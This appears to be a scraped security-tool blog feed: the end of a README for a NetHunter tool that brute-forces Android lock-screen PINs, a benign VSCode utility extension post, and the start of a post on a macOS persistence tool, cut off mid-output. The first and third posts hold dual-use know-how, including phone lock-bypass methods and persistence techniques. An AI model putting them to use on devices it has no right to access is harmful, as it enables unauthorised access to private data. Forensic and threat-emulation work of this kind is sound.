This can be downloaded from <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Use verbose output</b><br /> <p>Use the <code>--verbose</code> option to check the configuration is as expected. This is especially useful when you are modifying the configuration.</p> <br /><b>Use the dry-run</b><br /> <p>Use the <code>--dry-run</code> option to check how it operates without sending any keys to a device. This is especially useful when you are modifying the configuration or during development.</p> <p>A dry run will:</p> <ul> <li>Not send any keys</li> <li>Continue instead of aborting if the <code>KEYBOARD_DEVICE</code> or <code>HID_KEYBOARD</code> is missing.</li> </ul> <br /><b>HID USB Mode</b><br /> <p>Try this command in a shell on the NetHunter phone: <code>/system/bin/setprop sys.usb.config hid</code></p> <br /><span style="font-size: large;"><b>Known Issues</b></span><br /> <ul> <li>This cannot detect when the correct PIN is guessed and the phone unlocks.</li> <li>Your phones may run out of battery before the correct PIN is found.</li> <li>Don't trust phone configuration files from unknown sources without reviewing them first. 
The configuration files are shell scripts and could include malicious commands.</li> </ul> <br /><span style="font-size: large;"><b>Roadmap</b></span><br /> <ul> <li>[DONE] Works</li> <li>[DONE] Detects USB HID failures</li> <li>[DONE] Improve Usage and commandline options/config files</li> <li>[DONE] Add bruteforce for n digit PINs</li> <li>[DONE] Mask for known digits</li> <li>[DONE] Crack PIN list in reverse (to find which recent PIN unlocked the device)</li> <li>[DONE] Implement configurable lockscreen prompt</li> <li>[DONE] Implement cooldown change after 10 attempts</li> <li>[WORKING] Find/test more devices to bruteforce</li> <li>Add progress bar</li> <li>Add ETA</li> <li>ASCII art</li> <li>Nicer GUI for NetHunter</li> <li>Implement for iPhone</li> <li>Detect when a phone is unlocked (Use NetHunter camera as a sensor?)</li> <li>Crack Android Patterns (try common patterns first)</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.</p> <p>Please make sure to update tests as appropriate.</p> <br /><span style="font-size: large;"><b>Authors and acknowledgment</b></span><br /> <p>Developed by Andrew Horton (@urbanadventurer).</p> <p>The following people have been very helpful:</p> <ul> <li>Vlad Filatov (@v1adf): Testing many phones for the Wiki Phone Database</li> </ul> <br /><b>Motivation</b><br /> <p>My original motivation to develop this was to unlock a Samsung S5 Android phone. It had belonged to someone who had passed away, and their family needed access to the data on it. 
As I didn't have a USB <a href="https://www.kitploit.com/search/label/Rubber%20Ducky" target="_blank" title="Rubber Ducky">Rubber Ducky</a> or any other hardware handy, I tried using a variety of methods, and eventually realised I had to develop something new.</p> <br /><b>Credit</b><br /> <p>The optimised PIN list is from Justin Engler (@justinengler) and Paul Vines (Senior Security Engineer, iSEC Partners) and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO).">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)</a>.</p> <br /><b>Graphics</b><br /> <p>Designed by Andrew Horton, gratefully using these free vector packs:</p> <ul> <li><a href="https://www.vecteezy.com/vector-art/159576-usb-ports-isometric-free-vector" rel="nofollow" target="_blank" title="USB Ports Isometric Free Vector by VisionHeldup">USB Ports Isometric Free Vector by VisionHeldup</a></li> <li><a href="https://www.vecteezy.com/vector-art/107006-hdmi-and-usb-vector-set" rel="nofollow" target="_blank" title="HDMI and USB Vector Set by Mary Winkler">HDMI and USB Vector Set by Mary Winkler</a></li> <li><a href="https://www.vecteezy.com/vector-art/661831-isometric-data-security-illustration" rel="nofollow" target="_blank" title="Isometric Data Security Illustration by Rizal.Medanguide">Isometric Data Security Illustration by Rizal.Medanguide</a></li> <li>Kali NetHunter Logo</li> </ul> <br /><span style="font-size: large;"><b>Comparison with other projects and methods to unlock a locked Android phone</b></span><br /> <br /><b>What makes this project unique?</b><br /> <p>I've been asked what makes this project unique when there are other open-source Android PIN cracking projects.</p> <p>Android-PIN-Bruteforce is unique because it cracks the PIN on Android phones from a NetHunter 
phone and it doesn't need the locked phone to be pre-hacked.</p> <p>It works:</p> <ul> <li>Without having to buy special hardware, such as a Rubber Ducky, Cellebrite, or XPIN Clip.</li> <li>Without ADB or root access (the phone doesn't have to be pre-hacked).</li> </ul> <table> <tr> <th>Project</th> <th>ADB/USB Debugging</th> <th>Requires root</th> <th>Requires $ hardware</th> <th>Commercial</th> </tr> <tr> <td>⭐ Android-PIN-Bruteforce</td> <td>No</td> <td>No</td> <td>NetHunter phone</td> <td>No</td> </tr> <tr> <td>github.com/PentesterES/AndroidPINCrack</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/ByteRockstar1996/Cracking-Android-Pin-Lock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/sch3m4/androidpatternlock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/georgenicolaou/androidlockcracker</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/MGF15/P-Decode</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/BitesFor/ABL</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/wuseman/WBRUTER</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/Gh005t/Android-BruteForce</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/mandatoryprogrammer/droidbrute</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>No</td> </tr> <tr> <td>github.com/hak5darren/USB-Rubber-Ducky</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>Yes</td> </tr> <tr> <td>github.com/bbrother/stm32f4androidbruteforce</td> <td>No</td> <td>No</td> <td>STM32F4 dev board $</td> <td>No</td> </tr> <tr> <td>hdb-team.com/product/hdbox/</td> <td>No</td> <td>No</td> <td>HDBOX $$</td> <td>Yes</td> </tr> <tr> <td>xpinclip.com</td> <td>No</td> <td>No</td> <td>XPINClip $$</td> <td>Yes</td> </tr> <tr> <td>cellebrite.com/en/ufed/</td> <td>No</td> <td>No</td> 
<td>Cellebrite UFED $$$</td> <td>Yes</td> </tr> </table> <p>Some of these projects/products are really awesome, but they achieve a different goal to Android-PIN-Bruteforce.</p> <p>If a project requires a gesture.key or password.key, I've listed it as requiring root. If a project requires a custom bootloader, I've listed that as requiring both ADB and root. If you would like your project listed in this table then please open a new issue. There are links to each of these projects in the Related Projects & Further Reading section.</p> <br /><b>Regular phone users</b><br /> <ul> <li>Try the top 20 PINs from the <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="DataGenetics PIN analysis">DataGenetics PIN analysis</a> that apparently unlocks 26.83% of phones.</li> <li>Use an SMS lock-screen bypass app (requires app install before the phone is locked)</li> <li>Use Samsung Find My Mobile (requires you to set it up before the phone is locked)</li> <li>Crash the Lock Screen UI (Android 5.0 and 5.1)</li> <li>Use the Google Forgot pattern, Forgot PIN, or Forgot password (Android 4.4 KitKat and earlier)</li> <li>Factory Reset (you lose all your data)</li> </ul> <br /><b>Users who have already replaced their Android ROM</b><br /> <p>These methods apply if the phone has already been rooted, has USB debugging enabled, or has adb enabled:</p> <ul> <li>Flash the <code>Pattern Password Disable</code> ZIP using a custom recovery (requires TWRP, CMW, Xrec, etc.)</li> <li>Delete <code>/data/system/gesture.key</code> or <code>password.key</code> (requires root and adb on the locked device)</li> <li>Crack <code>/data/system/gesture.key</code> and <code>password.key</code> (requires root and adb on the locked device)</li> <li>Update the sqlite3 database <code>settings.db</code> (requires root and adb on the locked device)</li> </ul> <br /><b>Forensic Investigators</b><br /> <p>These methods can be expensive and are usually only used by 
specialised phone forensic investigators.</p> <p>In order of difficulty and expense:</p> <ul> <li>Taking advantage of USB debugging being enabled (Oxygen Forensic Suite)</li> <li>Bruteforce with keyboard emulation (⭐ Android-PIN-Bruteforce, RubberDucky attack, XPIN Clip, HDBOX)</li> <li>JTAG (Interface with TAPs (Test Access Ports) on the device board)</li> <li>In-System Programming (ISP) (Involves directly connecting to pins on flash memory chips on the device board)</li> <li>Chip Off (Desolder and remove flash memory chips from the device)</li> <li>Clock Glitching / Voltage <a href="https://www.kitploit.com/search/label/Fault%20Injection" target="_blank" title="Fault Injection">Fault Injection</a> (Hardware CPU timing attacks to bypass PIN restrictions)</li> <li>Bootloader exploits (Zero-day exploits that attack the bootloader; GrayKey from Grayshift and Cellebrite)</li> </ul> <p>JTAG, ISP, and Chip Off techniques are less useful now because most devices are encrypted. I don't know of any practical attacks on phone PINs that use clock glitching; if you know of a product that uses this technique, please let me know so I can include it.</p> <br /><b>Security Professionals and Technical Phone Users</b><br /> <p>Use the USB HID Keyboard Bruteforce with some dedicated hardware.</p> <ul> <li>A RubberDucky and Darren Kitchen's Hak5 brute-force script</li> <li>Write a script for a USB Teensy</li> <li>Buy expensive forensic hardware</li> <li>Or you can use Android-PIN-Bruteforce with your NetHunter phone!</li> </ul> <p>Attempts to use Duck Hunter, an otherwise awesome project, to emulate a RubberDucky payload for Android PIN cracking did not work. 
It crashed the phone, probably because of the payload length.</p><p><br /></p><span style="font-size: large;"><b>Related Projects & Further Reading</b></span><br /> <br /><b>USB HID Hardware without NetHunter</b><br /> <p>hak5 12x17: Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky <a href="https://archive.org/details/hak5_12x17" rel="nofollow" target="_blank" title="https://archive.org/details/hak5_12x17">https://archive.org/details/hak5_12x17</a></p> <p>Hak5: USB Rubber Ducky <a href="https://shop.hak5.org/products/usb-rubber-ducky-deluxe" rel="nofollow" target="_blank" title="https://shop.hak5.org/products/usb-rubber-ducky-deluxe">https://shop.hak5.org/products/usb-rubber-ducky-deluxe</a></p> <p>USB-Rubber-Ducky Payloads <a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" rel="nofollow" target="_blank" title="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads">https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads</a></p> <p>Teensy <a href="https://www.pjrc.com/teensy/" rel="nofollow" target="_blank" title="https://www.pjrc.com/teensy/">https://www.pjrc.com/teensy/</a></p> <p>Brute Forcing An Android Phone with an STM32F4Discovery Development Board <a href="https://github.com/bbrother/stm32f4androidbruteforce" rel="nofollow" target="_blank" title="https://github.com/bbrother/stm32f4androidbruteforce">https://github.com/bbrother/stm32f4androidbruteforce</a> <a href="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/" rel="nofollow" target="_blank" title="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/">https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/</a></p> <p>Automated brute force attack against the Mac EFI PIN (Using a Teensy) <a href="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html" rel="nofollow" target="_blank" title="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html">https://orvtech.com/atacar-efi-pin-macbook-pro-en.html</a> <a href="https://hackaday.io/project/2196-efi-bruteforcer" rel="nofollow" target="_blank" title="https://hackaday.io/project/2196-efi-bruteforcer">https://hackaday.io/project/2196-efi-bruteforcer</a></p> <p>Droidbrute: An Android PIN cracking USB rubber ducky payload made efficient with a statistically generated wordlist. <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>Forum discussion about the hak5 episode and the Android Brute Force 4-digit PIN payload <a href="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/" rel="nofollow" target="_blank" title="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/">https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/</a></p> <br /><b>NetHunter HID keyboard attacks</b><br /> <p>NetHunter HID Keyboard Attacks <a href="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/" rel="nofollow" target="_blank" title="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/">https://www.kali.org/docs/nethunter/nethunter-hid-attacks/</a></p> <br /><b>Linux Kernel HID support</b><br /> <p>Human Interface Devices (HID) <a href="https://www.kernel.org/doc/html/latest/hid/index.html#" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/hid/index.html#">https://www.kernel.org/doc/html/latest/hid/index.html#</a></p> <p>Linux USB HID gadget driver and hid-keyboard program <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a></p> <p>The usb-devices script <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Cracking Android PIN and Pattern files</b><br /> <p>AndroidPINCrack - bruteforce the Android Passcode given the hash and salt (requires root on the phone) <a href="https://github.com/PentesterES/AndroidPINCrack" rel="nofollow" target="_blank" title="https://github.com/PentesterES/AndroidPINCrack">https://github.com/PentesterES/AndroidPINCrack</a></p> <p>Android Pattern Lock Cracker - bruteforce the Android Pattern given an SHA1 hash (requires root on the phone) <a href="https://github.com/sch3m4/androidpatternlock" rel="nofollow" target="_blank" title="https://github.com/sch3m4/androidpatternlock">https://github.com/sch3m4/androidpatternlock</a></p> <br /><b>General Recovery Methods</b><br /> <p>[Android][Guide]Hacking And Bypassing Android Password/Pattern/Face/PI <a href="https://forum.xda-developers.com/showthread.php?t=2620456" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/showthread.php?t=2620456">https://forum.xda-developers.com/showthread.php?t=2620456</a></p> <p>Android BruteForce using ADB & Shell Scripting <a href="https://github.com/Gh005t/Android-BruteForce" rel="nofollow" target="_blank" title="https://github.com/Gh005t/Android-BruteForce">https://github.com/Gh005t/Android-BruteForce</a></p> <br /><b>Forensic Methods and Hardware</b><br /> <p>PATCtech Digital Forensics: Getting Past the Android Passcode <a href="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf" rel="nofollow" target="_blank" title="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf">http://patc.com/online/a/Portals/965/Android%20Passcode.pdf</a></p> <p>XPIN Clip <a href="https://xpinclip.com/" rel="nofollow" target="_blank" title="https://xpinclip.com/">https://xpinclip.com/</a></p> 
<p>HDBox from HDB Team <a href="https://hdb-team.com/product/hdbox/" rel="nofollow" target="_blank" title="https://hdb-team.com/product/hdbox/">https://hdb-team.com/product/hdbox/</a></p> <p>Cellebrite UFED <a href="https://www.cellebrite.com/en/ufed/" rel="nofollow" target="_blank" title="https://www.cellebrite.com/en/ufed/">https://www.cellebrite.com/en/ufed/</a></p> <p>GrayKey from Grayshift <a href="https://www.grayshift.com/graykey/" rel="nofollow" target="_blank" title="https://www.grayshift.com/graykey/">https://www.grayshift.com/graykey/</a></p> <br /><b>PIN Analysis</b><br /> <p>Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO) <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler">https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler</a></p> <p>DataGenetics PIN analysis <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="https://datagenetics.com/blog/september32012/index.html">https://datagenetics.com/blog/september32012/index.html</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/urbanadventurer/Android-PIN-Bruteforce" rel="nofollow" target="_blank" title="Download Android-PIN-Bruteforce">Download Android-PIN-Bruteforce</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-14951890310113649332021-04-15T08:30:00.007-04:002021-04-15T08:30:00.626-04:00Swissknife - Scriptable VSCode Extension To Generate Or Manipulate Data. 
Stop Pasting Sensitive Data In Webpag<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-B5UpDT2KTZM/YHYm_4SzRUI/AAAAAAAAV3k/MaaFXoBhY_wWvhbc0BcRnWVihahr3pzmwCNcBGAsYHQ/s1200/vscode-swissknife_1_swissknife_banner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1200" height="320" src="https://1.bp.blogspot.com/-B5UpDT2KTZM/YHYm_4SzRUI/AAAAAAAAV3k/MaaFXoBhY_wWvhbc0BcRnWVihahr3pzmwCNcBGAsYHQ/w640-h320/vscode-swissknife_1_swissknife_banner.png" width="640" /></a></div><p><br /></p><p>The developer's swissknife. Do conversions and generations right out of VS Code. Extendable with user scripts.</p> <p>Available in the <a href="https://marketplace.visualstudio.com/items?itemName=luisfontes19.vscode-swissknife" rel="nofollow" target="_blank" title="Visual Studio Marketplace">Visual Studio Marketplace</a></p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Currently available scripts</b></span><br /> <ul> <li>Base64 decode</li> <li>Base64 encode</li> <li>Binary To Text</li> <li>Bip39 Mnemonic</li> <li>CSV to Markdown</li> <li>Count characters</li> <li>Count words</li> <li>Crypto currency value</li> <li>Date to Timestamp</li> <li>Elliptic Curve Key Pair</li> <li>Generate Password</li> <li>HTML Encode (All)</li> <li>Hex decode</li> <li>Hex encode</li> <li>Hex to RGB</li> <li>Identify hash</li> <li>JWT Decode</li> <li>Join lines</li> <li>Lorem Ipsum</li> <li>Markdown to HTML</li> <li>Md5 hash</li> <li>New Swissknife Script (JS)</li> <li>New Swissknife Script (TS)</li> <li>Password strength</li> <li>RGB To Hex</li> <li>RSA Key pair</li> <li>Random String</li> <li>Request to fetch</li> <li>SHA1 hash</li> <li>SHA256 hash</li> <li>SHA512 hash</li> <li>Self Signed Certificate</li> <li>Start Local HTTP Server</li> <li>Start Local HTTPS Server</li> <li>Stop HTTP Server</li> <li>Text To Binary</li> <li>Text to String</li> 
<li>Timestamp to Date</li> <li>To Camel Case</li> <li>To Lower Case</li> <li>To Morse code</li> <li>To Upper Case</li> <li>UUIDv4</li> <li>Unicode decode</li> <li>Unicode encode (js format)</li> <li>Unix/Linux Permission To Human Readable</li> <li>Url Decode</li> <li>Url Encode</li> <li>Url Encode (All Characters)</li> <li>Url Shorten</li> <li>Url Unshorten (url expand)</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>You can invoke the dedicated command palette with <code>ctrl+shift+9</code> on <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="windows">Windows</a> or <code>cmd+shift+9</code> on Mac (when the editor has focus).</p> <p>The conversions will only use the selected text by default. If no text is selected, the entire content of the editor will be used. Multiple selections are supported, and the script is run for each selection individually.</p> <p><strong>Macbook Touchbar Support</strong> You can also invoke the swissknife extension directly from the MacBook's <a href="https://github.com/luisfontes19/vscode-swissknife/blob/master/data/touchbar_support.png" rel="nofollow" target="_blank" title="Touchbar support">touchbar</a>.</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-CsvWH40VC2k/YHYmkzayvNI/AAAAAAAAV3c/nJfcgswwkJMY94S4iCGdLddi92tJY0RWwCNcBGAsYHQ/s789/vscode-swissknife_4_touchbar_support.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="60" data-original-width="789" height="49" src="https://1.bp.blogspot.com/-CsvWH40VC2k/YHYmkzayvNI/AAAAAAAAV3c/nJfcgswwkJMY94S4iCGdLddi92tJY0RWwCNcBGAsYHQ/w640-h49/vscode-swissknife_4_touchbar_support.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Scripts Details</b></span><br /> <br /><b>Crypto currency value</b><br /> <p>Uses the API from <a href="https://github.com/luisfontes19/vscode-swissknife/blob/master/cryptonator.com" rel="nofollow" target="_blank" title="Cryptonator">Cryptonator</a>. You can specify conversions directly in the text, like:</p> <pre lang="text"><code>1btc to eur </code></pre> <p>For a list of supported currencies check <a href="https://www.cryptonator.com/api/currencies" rel="nofollow" target="_blank" title="here">here</a>.</p> <br /><b>Identify Hash</b><br /> <p>The operation may return multiple candidates, because hashes from different algorithms can share the same output format. The candidates are ordered from most to least relevant.</p> <br /><b>HTTP(S) Server</b><br /> <p>The servers log all requests received into the "Output" window of VSCode (you can show it by going to View -> Output in the menu). Then, in the dropdown on the right of the window (which usually shows "Tasks"), select "Swissknife Server".</p> <br /><span style="font-size: large;"><b>Privacy Note</b></span><br /> <p>One of the main purposes of this extension is to stop pasting data into, or trusting generated data from, random websites. 
The extension avoids doing external web requests or <a href="https://www.kitploit.com/search/label/Logging" target="_blank" title="logging">logging</a> data, for privacy. But there are some <a href="https://www.kitploit.com/search/label/Operations" target="_blank" title="operations">operations</a> where external requests are needed:</p> <ul> <li> <p><strong>Crypto Currency Value</strong> - Does a request to the cryptonator api to get the available cryptocurrencies and a request to get the current price for a specific pair. <strong>The amount being converted is not sent</strong>; it is calculated on the local machine.</p> </li> <li> <p><strong>Url Unshorten</strong> - This one really needs to do the request to the short url, so it can get the redirect (full) url. But keep in mind that the full url is never reached; the extension does not follow the redirect.</p> </li> <li> <p><strong>URL Shortening</strong> - The shortening feature uses <a href="https://tinyurl.com" rel="nofollow" target="_blank" title="https://tinyurl.com">https://tinyurl.com</a> to register a new short URL.</p> </li> </ul> <br /><span style="font-size: large;"><b>Writing Scripts</b></span><br /> <p>Swissknife will automatically load all <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> in its user <a href="https://www.kitploit.com/search/label/Scripting" target="_blank" title="scripting">scripting</a> folder, and you can find that folder by executing a command. Open your command palette and type "Open swissknife users script folder", or just start typing it, as it will eventually be suggested. This is the folder where you can create your custom scripts.</p> <p>To start a new script you can also use a command provided by the extension. 
Open the swissknife picker and type "New swissknife script".</p> <br /><b>Script Reloading</b><br /> <p>Scripts are loaded into the extension when VS Code initializes, so when you create a custom script you'll need to reload the scripts. To make development easier, the extension has a command "Reload Swissknife Scripts" that you can call from the VS Code command palette (do not confuse it with swissknife's own script launcher).</p> <p>Remember that every time you change a script in the user script folder you need to reload the scripts.</p> <br /><b>Starting Template</b><br /> <p>You can choose the TS or JS version according to what you're more comfortable with. TS is more involved because you need to transpile it to JS, so we'll go with JavaScript. This is the base structure of a script:</p> <div><pre><code>Object.defineProperty(exports, "__esModule", { value: true });<br /><br />// The callback receives the text to transform and the swissknife context,<br />// and resolves with the new text (here every "a" becomes a "b").<br />exports.doSomething = async (text, context) => {<br />  return new Promise((resolve, reject) => {<br />    resolve(text.replace(/a/g, "b"));<br />  });<br />}<br /><br />const scripts = [<br />  {<br />    title: "My Script",<br />    detail: "This script does something",<br />    // replaceRoutine swaps the selection (or the whole document) for the resolved result<br />    cb: (context) => context.replaceRoutine(exports.doSomething)<br />  },<br />]<br /><br />exports.default = scripts;</code></pre></div> <p>This is the basic template for creating scripts. In this file we created a script called "My Script". You can have as many scripts as you want per file; it's just a way of organizing them :) As you can see at the end, a script consists of three properties: title, detail and cb. The first two are self-explanatory. cb is the code that is called when your script runs, and by default swissknife gives you a few helper methods through the 'context' variable. The method doSomething just replaces a's with b's.</p> <br /><b>Context</b><br /> <p>In context you have some nice methods to help you out, and you should use them whenever possible.</p> <ul> <li>insertRoutine(cb) - This method will insert the resolved content at the cursor in the editor. It will call cb and pass context as a parameter. <strong>cb is expected to be async</strong></li> <li>informationRoutine(cb) - This method will create a notification with the resolved content. It will call cb and pass the selected text in the editor (all text if no selection) and context as parameters. <strong>cb is expected to be async</strong></li> <li>replaceRoutine(cb) - This method will replace the selected text in the editor with the resolved content from cb (if no text is selected it replaces all text). It will call cb and pass the selected text in the editor (all text if no selection) and context as parameters. <strong>cb is expected to be async</strong></li> <li>vscode - This variable holds the <a href="https://code.visualstudio.com/api" rel="nofollow" target="_blank" title="vscode api">vscode api</a>.</li> <li>modules - This variable is an array of all JS modules inside the <a href="https://github.com/luisfontes19/vscode-swissknife/tree/master/src/scripts" rel="nofollow" target="_blank" title="script (and lib) folder">script (and lib) folder</a>. You can use them to call methods from the native scripts and reuse code logic. Ex: context.modules.passwords.generateSecureCharCode()</li> </ul> <p>The use of these methods is optional. If you feel it's easier to work directly with the vscode api, you can also do that:</p> <div><pre><code>Object.defineProperty(exports, "__esModule", { value: true });<br /><br />const scripts = [<br />  {<br />    title: "My Script2",<br />    detail: "This script does something",<br />    cb: (context) => {<br />      console.log(context)<br />      // Use the VS Code API from the context instead of the helper routines<br />      const editor = context.vscode.window.activeTextEditor;<br />      editor.edit((edit) => {<br />        // insert at the active end of the current selection<br />        edit.insert(editor.selection.active, "Doing stuff")<br />      });<br />    }<br />  },<br />]<br /><br />exports.default = scripts;</code></pre></div> <br /><span style="font-size: large;"><b>More Examples</b></span><br /> <p>The best place to see examples is to check the <a href="https://github.com/luisfontes19/vscode-swissknife/tree/master/src/scripts" rel="nofollow" target="_blank" title="native scripts">native scripts</a> bundled with the extension.</p> <br /><span style="font-size: large;"><b>Future Plans</b></span><br /> <ul> <li>Create unit tests, especially for the scripts</li> <li>Start doing proper error handling</li> <li>Create a place for user contributed scripts</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luisfontes19/vscode-swissknife/" rel="nofollow" target="_blank" title="Download Vscode-Swissknife">Download Vscode-Swissknife</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-82461341955725240012021-04-09T17:30:00.014-04:002021-04-09T17:30:00.511-04:00PoisonApple - macOS Persistence Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-3eJpGzR4jCw/YGvdt_8YhII/AAAAAAAAVz0/tson_bgPELET5D6FG6gpLY8-CfOZ5PMigCNcBGAsYHQ/s333/PoisonApple_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="333" data-original-width="333" height="400" src="https://1.bp.blogspot.com/-3eJpGzR4jCw/YGvdt_8YhII/AAAAAAAAVz0/tson_bgPELET5D6FG6gpLY8-CfOZ5PMigCNcBGAsYHQ/w400-h400/PoisonApple_1.png" width="400" /></a></div><p><br /></p> <p>Command-line tool to perform various persistence mechanism techniques on macOS. 
This tool was designed to be used by <a href="https://www.kitploit.com/search/label/Threat" target="_blank" title="threat">threat</a> hunters for cyber threat <a href="https://www.kitploit.com/search/label/Emulation" target="_blank" title="emulation">emulation</a> purposes.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Install</b></span><br />
<p>Do it up:</p>
<pre><code>$ pip3 install poisonapple --user<br /></code></pre>
<p>Note: PoisonApple was written and tested using Python 3.9; it should work with Python 3.6+.</p>
<br /><span style="font-size: large;"><b>Important Notes!</b></span><br />
<ul>
<li>PoisonApple will make modifications to your macOS system, so it's advised to only use PoisonApple on a virtual machine. Although any persistence mechanism technique added using this tool can also be easily removed (-r), <strong>please use with caution</strong>!</li>
<li>Be advised: this tool will likely cause common AV / EDR / other macOS security products to generate alerts.</li>
<li>To understand how any of these techniques work in depth, please see <a href="https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" rel="nofollow" target="_blank" title="The Art of Mac Malware, Volume 1:">The Art of Mac Malware, Volume 1: </a><a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="Analysis">Analysis</a> - Chapter 0x2: Persistence by Patrick Wardle of Objective-See. 
It's a fantastic resource.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>See PoisonApple switch options (--help):</p> <pre><code>$ poisonapple --help<br />usage: poisonapple [-h] [-l] [-t TECHNIQUE] [-n NAME] [-c COMMAND] [-r]<br /><br />Command-line tool to perform various persistence mechanism techniques on macOS.<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -l, --list list available persistence mechanism techniques<br /> -t TECHNIQUE, --technique TECHNIQUE<br /> persistence mechanism technique to use<br /> -n NAME, --name NAME name for the file or label used for persistence<br /> -c COMMAND, --command COMMAND<br /> command(s) to execute for persistence<br /> -r, --remove remove persistence mechanism<br /></code></pre> <p>List of available techniques:</p> <pre><code>$ poisonapple --list<br /> , _______ __<br /> .-.:|.-. | _ .-----|__|-----.-----.-----.<br />.' '. |. | | | | |__ --| | | | |<br />'-."~". .-' |. ____|_____|__|_____|_____|__|__|<br /> } ` } { |: | _______ __<br /> } } } { |::.| | _ .-----.-----| |-----.<br /> } ` } { `---' |. | | | | | | | -__|<br />.-'"~" '-. |. _ | __| __|__|_____|<br />'. .' |: | |__| |__|<br /> '-_.._-' |::.|:. 
